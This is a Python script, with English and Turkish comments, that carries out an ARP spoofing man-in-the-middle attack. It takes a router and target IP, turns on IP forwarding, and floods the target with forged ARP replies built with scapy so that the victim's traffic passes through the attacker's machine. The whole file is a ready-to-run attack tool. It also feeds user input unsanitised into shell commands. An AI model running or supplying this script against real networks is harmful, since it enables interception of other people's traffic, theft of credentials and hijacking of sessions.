#!/usr/bin/python3

# AUTHOR: CYB3RMX_

import os
from scapy.all import *

def SendSpoof():
    # [EN] Getting interface, targets and routers ip.
    # [TR] Network arayuzunu, hedefin ve yönlendiricinin ip adresii aliyoruz.
    router = str(input("[+] Enter router ip: "))
    target = str(input("[+] Enter target ip: "))
    ifacer = str(input("[+] Enter interface: "))

    # [EN] Getting and parsing mac address.
    # [TR] MAC adresini parse ediyoruz.
    macaddr = 'ifconfig {} | grep -o "ether [a-z0-9]*:[a-z0-9]*:[a-z0-9]*:[a-z0-9]*:[a-z0-9]*:[a-z0-9]*" | cut -c7-23 > mac.txt'.format(ifacer)
    os.system(macaddr)
    getMac = open("mac.txt", "r").read().split("\n")
    os.system("rm -rf mac.txt")

    # [EN] Enabling ip forwarding so our victim's connection will continue.
    # [TR] IP forward i etkinlestirip kurbanin baglantisinin kesilmemesini sagliyoruz.
    print("[*] Enabling IP forward...")
    os.system("sudo echo 1 > /proc/sys/net/ipv4/ip_forward")

    print("\n[*] Attacking to: %s on %s"%(target, ifacer))
    try:
        while True:
            # [EN]
            # Sending malicious ARP packets to target.

            # [TR]
            # Zararli ARP paketlerini hedefe gonderiyoruz.
            send(ARP(op=2, pdst=target, hwsrc=getMac[0], psrc=router), verbose=0)
    except:
        # [EN] Terminating the program.
        # [TR] Program kapanirken yapilan isler.
        print("[*] Disabling IP forward...")
        os.system("sudo echo 0 > /proc/sys/net/ipv4/ip_forward")
        print("[!] Program terminated.")
SendSpoof()
